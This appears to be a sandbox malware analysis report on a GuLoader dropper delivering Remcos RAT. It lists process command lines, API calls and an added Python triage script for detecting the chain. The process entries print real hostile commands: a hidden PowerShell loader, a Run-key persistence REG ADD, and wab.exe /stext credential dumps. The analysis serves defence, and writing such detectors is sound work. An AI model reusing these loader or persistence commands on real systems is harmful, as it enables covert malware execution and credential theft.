                                                                                            2024-04-19 17:12:09 UTC1369INData Raw: b7 74 f6 af 75 5b 26 49 ea b2 b9 2c 9c 6a 3d df 0d 1a 64 69 d4 47 ef 11 c3 ba 39 40 eb cf cf 1f 45 18 26 7e 90 97 dd d2 a7 ff bd 48 6c 86 24 57 ef 1c 3f 9c 6d ed 13 a9 f9 cb 8c 1e 10 af 4f d6 7f da e5 1e 2c 86 dd 79 95 09 ef 7b 1f cc 28 59 9e c4 9e 62 20 5e bc ff 43 cb 7b 81 48 52 c8 fb 9a 6c b6 e8 30 77 d3 4f 3c d7 39 3e cf 6e f6 74 ae 22 2e 49 28 06 79 64 c1 60 8c eb d1 61 cd 8f 18 29 21 c9 32 5a a2 b9 52 17 80 b3 2c 09 15 48 5f 20 b9 cb 08 21 c8 1f 67 62 24 e8 48 75 f6 0a 75 61 57 ef 9a 5a 0b 52 33 e5 f4 f6 04 53 7d d9 d0 8f 9f b2 a0 f5 5b d5 29 8f 93 4b 00 20 de 81 60 33 5e 87 26 f3 af 50 be 8a 47 bc ec a4 ae 7d 8d 71 0c 11 19 61 48 75 ff b5 7f cb 79 85 51 cc 93 52 47 2a ab 41 e3 2c 64 ec 05 d0 cf b1 ab 9e ad 1d 50 7f 5b 6b ac 5e 58 27 86 2f a2 f9 55
                                                                                            Data Ascii: tu[&I,j=diG9@E&~Hl$W?mO,y{(Yb ^C{HRl0wO<9>nt".I(yd`a)!2ZR,H_ !gb$HuuaWZR3S}[)K `3^&PG}qaHuyQRG*A,dP[k^X'/U



                                                                                            Target ID:0
                                                                                            Start time:19:10:57
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:533'858 bytes
                                                                                            MD5 hash:0E1262A4CE5AC71AD5B8DF93030D61B5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:1
                                                                                            Start time:19:10:58
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content 'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)"
                                                                                            Imagebase:0x1e0000
                                                                                            File size:433'152 bytes
                                                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2405665204.0000000009F4C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:2
                                                                                            Start time:19:10:58
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:19:11:00
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:7
                                                                                            Start time:19:11:58
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                            Imagebase:0xa70000
                                                                                            File size:516'608 bytes
                                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2417745703.000000000971E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2443472067.000000000971E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.2939981416.000000000971F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000003.2417578332.000000000971A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:false

                                                                                            Target ID:8
                                                                                            Start time:19:12:05
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:9
                                                                                            Start time:19:12:05
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            Target ID:10
                                                                                            Start time:19:12:05
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Windows\SysWOW64\reg.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;%Slettelsers% ($ronnels)"
                                                                                            Imagebase:0x900000
                                                                                            File size:59'392 bytes
                                                                                            MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:11
                                                                                            Start time:19:12:12
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"
                                                                                            Imagebase:0xa70000
                                                                                            File size:516'608 bytes
                                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:12
                                                                                            Start time:19:12:12
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"
                                                                                            Imagebase:0xa70000
                                                                                            File size:516'608 bytes
                                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:13
                                                                                            Start time:19:12:12
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\hdqrgswaarisauuvaipksos"
                                                                                            Imagebase:0xa70000
                                                                                            File size:516'608 bytes
                                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            Target ID:14
                                                                                            Start time:19:12:12
                                                                                            Start date:19/04/2024
                                                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jfwcglgtwzafkaizktcddtnovi"
                                                                                            Imagebase:0xa70000
                                                                                            File size:516'608 bytes
                                                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true
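Read together, the Target ID entries above give the whole chain. The sample starts a hidden PowerShell that reads Kursusplans.Fje, slices a three-character token out of it at offset 61080 and invokes that token with the call operator, so the command actually run never appears on the command line. GuLoader then gets the Remcos payload into wab.exe (Windows Contacts), which is why the Sigma rule for an unusual wab.exe parent fires. Persistence is a Run value of type REG_EXPAND_SZ whose data begins with %Slettelsers%, a variable that is not a Windows default and so has to be supplied by the malware itself (an inference from the value, the page does not show where it is set), and whose script body is read back from HKCU\Forsorgspdagog\Skeletoverstter rather than stored in the Run value. The later wab.exe copies carry /stext <file>, the NirSoft save-to-text switch, which is what the WebBrowserPassView and mail-credential hits in the signature list refer to. The triage rules below encode those three observations and run them over process events constructed from the entries above. They are an added example for this page, not Joe Sandbox, GuLoader or Remcos code; the parent links and the Sysmon-style field names are assumptions, because the report does not list parent processes.

```python
"""Triage rules for the process chain listed above.

Added example for this page, not Joe Sandbox, GuLoader or Remcos code. EVENTS is
constructed from the Target ID entries; ppid links and field names are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int          # the report's Target ID stands in for a pid (assumption)
    ppid: int
    image: str
    cmdline: str


WAB = r"C:\Program Files (x86)\Windows Mail\wab.exe"
EVENTS = [
    ProcEvent(0, -1, r"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",
              r'"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"'),
    ProcEvent(1, 0, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"powershell.exe" -windowstyle hidden "$Bromslvs=Get-Content '
              r"'C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje';"
              r'$Oxyphosphate=$Bromslvs.SubString(61080,3);.$Oxyphosphate($Bromslvs)"'),
    ProcEvent(3, 1, r"C:\Windows\SysWOW64\cmd.exe", r'"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"'),
    ProcEvent(7, 1, WAB, r'"C:\Program Files (x86)\windows mail\wab.exe"'),
    ProcEvent(8, 7, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run'
              r' /f /v "Startup key" /t REG_EXPAND_SZ /d "%Slettelsers% -windowstyle minimized'
              r" $ronnels=(Get-ItemProperty -Path 'HKCU:\Forsorgspdagog\').Skeletoverstter;"
              r'%Slettelsers% ($ronnels)"'),
    ProcEvent(11, 7, WAB, r'"C:\Program Files (x86)\windows mail\wab.exe" /stext '
                          r'"C:\Users\user\AppData\Local\Temp\wjdznalymjqnxoyrjyc"'),
    # constructed benign control: the user opens Windows Contacts from the shell
    ProcEvent(100, 99, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(101, 100, WAB, '"' + WAB + '"'),
]

# Rule 1: PowerShell reads a blob, slices a short token out of it and invokes the token
# through the call operator, so the command name never appears on the command line.
PS_LOADER = re.compile(
    r"Get-Content\s+'([^']+)'.*?\.SubString\((\d+)\s*,\s*(\d+)\).*?[.&]\$(\w+)\(", re.I | re.S)


def powershell_substring_loader(cmdline):
    m = PS_LOADER.search(cmdline)
    if not m:
        return None
    return {"path": m.group(1), "offset": int(m.group(2)),
            "length": int(m.group(3)), "invoked_via": m.group(4)}


# Rule 2: REG ADD into a Run key whose REG_EXPAND_SZ data starts with a non-default %VAR%
# (interpreter name kept out of the value) and reads its script body from another HKCU key.
RUN_KEY = re.compile(r"REG\s+ADD\s+(HK\w+\\\S*?\\Run)\b(.*)", re.I | re.S)
STANDARD_ENV = {"SYSTEMROOT", "WINDIR", "PROGRAMFILES", "PROGRAMFILES(X86)", "APPDATA",
                "LOCALAPPDATA", "USERPROFILE", "TEMP", "TMP", "PUBLIC", "COMSPEC"}


def run_key_persistence(cmdline):
    m = RUN_KEY.search(cmdline)
    if not m:
        return None
    key, rest = m.group(1), m.group(2)
    name = re.search(r'/v\s+(?:"([^"]*)"|(\S+))', rest)
    vtype = re.search(r"/t\s+(\w+)", rest)
    data = re.search(r'/d\s+(?:"(.*)"|(\S+))', rest, re.S)
    data_str = (data.group(1) or data.group(2)) if data else ""
    env_refs = sorted(set(re.findall(r"%(\w+(?:\(\w+\))?)%", data_str)))
    custom = [e for e in env_refs if e.upper() not in STANDARD_ENV]
    return {"key": key, "value_name": (name.group(1) or name.group(2)) if name else None,
            "value_type": vtype.group(1).upper() if vtype else None, "env_refs": env_refs,
            "suspicious": bool(custom) or "get-itemproperty" in data_str.lower()}


# Rule 3: wab.exe launched by anything but the shell, or carrying the NirSoft-style
# "/stext <file>" export switch that the WebBrowserPassView Yara hit points at.
EXPECTED_WAB_PARENTS = {"explorer.exe"}   # assumption: tune to the environment


def wab_anomaly(ev, by_pid):
    if not ev.image.lower().endswith("\\wab.exe"):
        return None
    parent = by_pid.get(ev.ppid)
    parent_name = parent.image.rsplit("\\", 1)[-1].lower() if parent else "<unknown>"
    reasons = []
    if parent_name not in EXPECTED_WAB_PARENTS:
        reasons.append(f"unexpected parent {parent_name}")
    if re.search(r"\s/stext\s", ev.cmdline, re.I):
        reasons.append("/stext password-export switch")
    return reasons or None


def triage(events):
    by_pid = {e.pid: e for e in events}
    findings = []
    for ev in events:
        if (r := powershell_substring_loader(ev.cmdline)):
            findings.append((ev.pid, "powershell_substring_loader", r))
        if (r := run_key_persistence(ev.cmdline)) and r["suspicious"]:
            findings.append((ev.pid, "run_key_persistence", r))
        if (r := wab_anomaly(ev, by_pid)):
            findings.append((ev.pid, "wab_anomaly", r))
    return findings


if __name__ == "__main__":
    for pid, rule, detail in triage(EVENTS):
        print(f"Target {pid}: {rule}: {detail}")
```

Run as a script it reports Targets 1, 7, 8 and 11 and stays silent on the constructed explorer.exe launch of wab.exe. The rules key on structure (a sliced token invoked through `.`, a Run value that resolves its interpreter through a custom variable, wab.exe with the wrong parent or with /stext) rather than on the Danish-looking identifiers or the "Startup key" value name, which change per build and make poor indicators. EXPECTED_WAB_PARENTS and STANDARD_ENV are the two lists to adjust for a real estate before deploying anything like this.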


                                                                                              Execution Graph

                                                                                              Execution Coverage:23.5%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:21.2%
                                                                                              Total number of Nodes:1309
                                                                                              Total number of Limit Nodes:35
execution_graph

This section is the report's interactive call-graph widget flattened into text; the raw node/edge dump is not reproduced here. In the dump each node is a four-digit node id followed by a six-hex-digit function address in the sample and the Win32 APIs that function calls, an edge "a->b" is a call from node a to node b, and "N API calls" marks a callee whose sub-graph was collapsed. The API usage recoverable from the graph, grouped by theme:

Entry routine at 0x4032a0: SetErrorMode, GetVersion, GetSystemDirectoryW, GetModuleHandleA, GetModuleHandleW, LoadLibraryExW, GetProcAddress, an ordinal import (#17), OleInitialize, SHGetFileInfoW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, GetTempFileNameW, CreateDirectoryW, SetFileSecurityW, SetCurrentDirectoryW, CopyFileW, MoveFileExW, CreateProcessW, DeleteFileW, RegisterClassW, SystemParametersInfoW, CreateWindowExW, DialogBoxParamW, ExitProcess
Reboot/privilege path at 0x40372b: GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx
Reading its own module file at 0x402dee: GetTickCount, GetModuleFileNameW, GetFileAttributesW, CreateFileW, GetFileSize, SetFilePointer, ReadFile, WriteFile, GlobalAlloc, GlobalFree, MulDiv, wsprintfW
File system: GetFileAttributesW, CreateFileW, CloseHandle, SetFileTime, CompareFileTime, SetFileAttributesW, FindFirstFileW, FindNextFileW, FindClose, FindCloseChangeNotification, GetFullPathNameW, GetShortPathNameW, SearchPathW, MoveFileW, RemoveDirectoryW, SHFileOperationW, GetDiskFreeSpaceW, GetLastError
Registry: RegOpenKeyExW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey
INI files: GetPrivateProfileStringW, WritePrivateProfileStringW
Process, shell and COM: ShellExecuteW, WaitForSingleObject, GetExitCodeProcess, CreateThread, Sleep, ExpandEnvironmentStringsW, CoCreateInstance, SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, CoTaskMemFree, OleUninitialize
Window messaging and dialogs: FindWindowExW, SendMessageW, SendMessageTimeoutW, PeekMessageW, DispatchMessageW, GetMessagePos, PostQuitMessage, DefWindowProcW, CallWindowProcW, KiUserCallbackDispatcher, GetDlgItem, GetDlgItemTextW, SetDlgItemTextW, CheckDlgButton, SetWindowTextW, ShowWindow, EnableWindow, IsWindow, IsWindowVisible, SetForegroundWindow, SetWindowPos, SetTimer, CreateDialogParamW, DestroyWindow, GetWindowLongW, SetWindowLongW, SetClassLongW, GetClassInfoW, MessageBoxIndirectW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, GetWindowRect, GetClientRect, ScreenToClient, GetSystemMetrics, InvalidateRect
Drawing: BeginPaint, EndPaint, FillRect, GetDC, ReleaseDC, GetDeviceCaps, CreateBrushIndirect, CreateFontIndirectW, DeleteObject, LoadImageW, ImageList_Destroy, GetSysColor, SetBkMode, SetBkColor, SetTextColor
Clipboard at 0x40560f: OpenClipboard, EmptyClipboard, GlobalAlloc, GlobalLock, GlobalUnlock, SetClipboardData, CloseClipboard
Strings and loader: lstrcpyA, lstrcpyW, lstrcpynW, lstrcatW, lstrlenA, lstrlenW, lstrcmpW, lstrcmpiA, lstrcmpiW, CharNextA, CharNextW, CharPrevW, wsprintfA, wsprintfW, WideCharToMultiByte, MultiByteToWideChar, FreeLibrary
3552->3563 3553->3554 3555 403c83 ShowWindow 3554->3555 3556 403c9b 3554->3556 3555->3556 3559 403ca3 DestroyWindow 3556->3559 3560 403cbd 3556->3560 3561 40140b 2 API calls 3557->3561 3584 403e4c 3558->3584 3564 40409d 3559->3564 3565 403cc2 SetWindowLongW 3560->3565 3566 403cd3 3560->3566 3561->3550 3567 403e12 3562->3567 3564->3563 3576 4040ce ShowWindow 3564->3576 3565->3563 3569 403d7c 3566->3569 3570 403cdf GetDlgItem 3566->3570 3567->3552 3571 403e16 SendMessageW 3567->3571 3568 40409f DestroyWindow EndDialog 3568->3564 3575 40417b 8 API calls 3569->3575 3573 403cf2 SendMessageW IsWindowEnabled 3570->3573 3574 403d0f 3570->3574 3571->3563 3572 40140b 2 API calls 3572->3584 3573->3563 3573->3574 3578 403d1c 3574->3578 3581 403d63 SendMessageW 3574->3581 3582 403d2f 3574->3582 3589 403d14 3574->3589 3575->3563 3576->3563 3577 406072 18 API calls 3577->3584 3578->3581 3578->3589 3579 4040ed SendMessageW 3583 403d4a 3579->3583 3580 404114 19 API calls 3580->3584 3581->3569 3585 403d37 3582->3585 3586 403d4c 3582->3586 3583->3569 3584->3563 3584->3568 3584->3572 3584->3577 3584->3580 3591 404114 19 API calls 3584->3591 3606 403fdf DestroyWindow 3584->3606 3587 40140b 2 API calls 3585->3587 3588 40140b 2 API calls 3586->3588 3587->3589 3590 403d53 3588->3590 3589->3579 3590->3569 3590->3589 3592 403ec7 GetDlgItem 3591->3592 3593 403ee4 ShowWindow KiUserCallbackDispatcher 3592->3593 3594 403edc 3592->3594 3615 404136 KiUserCallbackDispatcher 3593->3615 3594->3593 3596 403f0e EnableWindow 3599 403f22 3596->3599 3597 403f27 GetSystemMenu EnableMenuItem SendMessageW 3598 403f57 SendMessageW 3597->3598 3597->3599 3598->3599 3599->3597 3616 404149 SendMessageW 3599->3616 3617 406050 lstrcpynW 3599->3617 3602 403f85 lstrlenW 3603 406072 18 API calls 3602->3603 3604 403f9b SetWindowTextW 3603->3604 3605 401389 2 API calls 3604->3605 3605->3584 3606->3564 3607 403ff9 CreateDialogParamW 3606->3607 3607->3564 3608 40402c 3607->3608 3609 404114 19 API calls 3608->3609 3610 
404037 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3609->3610 3611 401389 2 API calls 3610->3611 3612 40407d 3611->3612 3612->3563 3613 404085 ShowWindow 3612->3613 3614 404160 SendMessageW 3613->3614 3614->3564 3615->3596 3616->3599 3617->3602

                                                                                              Control-flow Graph
                                                                                              APIs
                                                                                              • SetErrorMode.KERNELBASE ref: 004032C3
                                                                                              • GetVersion.KERNEL32 ref: 004032C9
                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032F2
                                                                                              • #17.COMCTL32(00000007,00000009), ref: 00403315
                                                                                              • OleInitialize.OLE32(00000000), ref: 0040331C
                                                                                              • SHGetFileInfoW.SHELL32(0042B208,00000000,?,000002B4,00000000), ref: 00403338
                                                                                              • GetCommandLineW.KERNEL32(Podning Setup,NSIS Error), ref: 0040334D
                                                                                              • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00000000), ref: 00403360
                                                                                              • CharNextW.USER32(00000000,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00000020), ref: 00403387
                                                                                                • Part of subcall function 0040642A: GetModuleHandleA.KERNEL32(?,00000020,?,00403309,00000009), ref: 0040643C
                                                                                                • Part of subcall function 0040642A: GetProcAddress.KERNEL32(00000000,?), ref: 00406457
                                                                                              • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004034C1
                                                                                              • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004034D2
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034DE
                                                                                              • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004034F2
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004034FA
                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040350B
                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403513
                                                                                              • DeleteFileW.KERNELBASE(1033), ref: 00403527
                                                                                                • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Podning Setup,NSIS Error), ref: 0040605D
                                                                                              • OleUninitialize.OLE32(?), ref: 004035F2
                                                                                              • ExitProcess.KERNEL32 ref: 00403613
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403626
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403635
                                                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403640
                                                                                              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe",00000000,?), ref: 0040364C
                                                                                              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403668
                                                                                              • DeleteFileW.KERNEL32(0042AA08,0042AA08,?,00435000,?), ref: 004036C2
                                                                                              • CopyFileW.KERNEL32(00442800,0042AA08,00000001), ref: 004036D6
                                                                                              • CloseHandle.KERNEL32(00000000,0042AA08,0042AA08,?,0042AA08,00000000), ref: 00403703
                                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403732
                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403739
                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040374E
                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403771
                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 00403796
                                                                                              • ExitProcess.KERNEL32 ref: 004037B9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1701220140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1701195663.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701246784.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701264658.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1701511394.0000000000454000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_z14Novospedidosdecompra_Profil_4903.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\z14Novospedidosdecompra_Profil_4903.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender$C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Extracollegiate\Chiffonnierer\Rudekonvolutten$C:\Users\user\AppData\Roaming\skabiose\slgtsarvens\prender\Kursusplans.Fje$C:\Users\user\Desktop$Error launching installer$Low$NSIS Error$Podning Setup$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                              • API String ID: 2488574733-4201898645
                                                                                              • Opcode ID: d642b4404a9fb060cda4fdd4f2973dfb2e781bfd167540d7ae6d73c1a9f34bb2
                                                                                              • Instruction ID: bc0dc6ca93ec9440221f6a1154d69e62cad873230aa3e7f423b6c7eed9202452
                                                                                              • Opcode Fuzzy Hash: d642b4404a9fb060cda4fdd4f2973dfb2e781bfd167540d7ae6d73c1a9f34bb2
                                                                                              • Instruction Fuzzy Hash: 60D1F470600300ABE710BF759D45B2B3AADEB8074AF51443FF581B62E1DB7D8A458B6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,00000403), ref: 0040534C
                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 0040535B
                                                                                              • GetClientRect.USER32(?,?), ref: 00405398
                                                                                              • GetSystemMetrics.USER32(00000002), ref: 0040539F
